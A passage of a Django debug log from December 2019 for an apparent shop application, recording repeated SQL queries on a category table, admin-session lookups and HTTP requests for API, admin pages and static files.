"shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:28:46,572 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:28:46,576 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:28:46,580 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:28:46,584 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:28:46,588 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:28:46,592 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:28:46] "GET /api/v1/categories/ HTTP/1.0" 200 1769 [13/Dec/2019 08:29:00] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 08:29:06,468 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:29:06,476 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:29:06,479 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:29:06,483 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:29:06,488 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:29:06,491 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:29:06,494 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:29:06,497 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:29:06,501 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:29:06,505 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:29:06,508 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:29:06] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 08:29:08,784 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:29:08,790 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:29:08,792 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:29:08,795 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:29:08,797 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:29:08,800 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:29:08,802 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:29:08,805 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:29:08,807 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:29:08,810 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:29:08,812 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:29:08] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 08:29:15,256 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:29:15,262 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:29:15,264 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:29:15,267 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:29:15,269 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:29:15,271 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:29:15,273 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:29:15,276 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:29:15,278 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:29:15,280 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:29:15,283 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:29:15] "GET /api/v1/categories/ HTTP/1.0" 200 1769 [13/Dec/2019 08:35:41] "GET / HTTP/1.0" 302 0 [13/Dec/2019 08:40:44] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 08:43:58,742 utils 11259 139831317362432 (0.007) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T08:43:58.724479+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 8, 43, 58, 724479, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 08:43:58,749 utils 11259 139831317362432 (0.005) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 08:43:58,807 utils 11259 139831317362432 (0.010) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-13 08:43:58,821 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T08:43:58.818715+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 8, 43, 58, 818715, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 08:43:58] "GET / HTTP/1.0" 200 8875 [13/Dec/2019 08:43:59] "GET /static/admin/css/base.css HTTP/1.0" 304 0 [13/Dec/2019 08:43:59] "GET /static/admin/css/dashboard.css HTTP/1.0" 200 412 [13/Dec/2019 08:43:59] "GET /static/admin/css/responsive.css HTTP/1.0" 304 0 Not Found: /robots.txt [13/Dec/2019 08:43:59] "GET /robots.txt HTTP/1.0" 404 6626 DEBUG 2019-12-13 08:43:59,630 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T08:43:59.622379+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 8, 43, 59, 622379, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 08:43:59,633 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 08:43:59,665 utils 11259 139831317362432 (0.002) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-13 08:43:59,673 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T08:43:59.671715+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 8, 43, 59, 671715, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 08:43:59] "GET / HTTP/1.0" 200 8875 [13/Dec/2019 08:44:00] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [13/Dec/2019 08:44:00] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 [13/Dec/2019 08:44:00] "GET /static/admin/img/icon-deletelink.svg HTTP/1.0" 200 392 [13/Dec/2019 08:44:00] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [13/Dec/2019 08:44:00] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [13/Dec/2019 08:44:00] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 200 85876 [13/Dec/2019 08:44:00] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 Not Found: /favicon.ico [13/Dec/2019 08:44:02] "GET /favicon.ico HTTP/1.0" 404 6629 DEBUG 2019-12-13 08:44:03,902 utils 11259 139831317362432 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T08:44:03.892190+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 8, 44, 3, 892190, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 08:44:03,905 utils 11259 139831317362432 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-13 08:44:03,911 utils 11259 139831317362432 (0.004) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-13 08:44:03,912 utils 11259 139831317362432 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-13 08:44:03,918 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-13 08:44:04,062 utils 11259 139831317362432 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-27T08:44:04.059906+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 27, 8, 44, 4, 59906, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [13/Dec/2019 08:44:04] "GET /shop/category/ HTTP/1.0" 200 6758 [13/Dec/2019 08:44:04] "GET /static/admin/css/changelists.css HTTP/1.0" 200 6170 [13/Dec/2019 08:44:04] "GET /static/admin/js/jquery.init.js HTTP/1.0" 200 363 [13/Dec/2019 08:44:04] "GET /static/admin/js/core.js HTTP/1.0" 200 7099 [13/Dec/2019 08:44:04] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.0" 200 6918 [13/Dec/2019 08:44:04] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.0" 200 271817 DEBUG 2019-12-13 08:44:04,479 utils 11259 139831317362432 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-13T08:44:04.466159+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 13, 8, 44, 4, 466159, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-13 08:44:04,483 utils 11259 139831317362432 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" 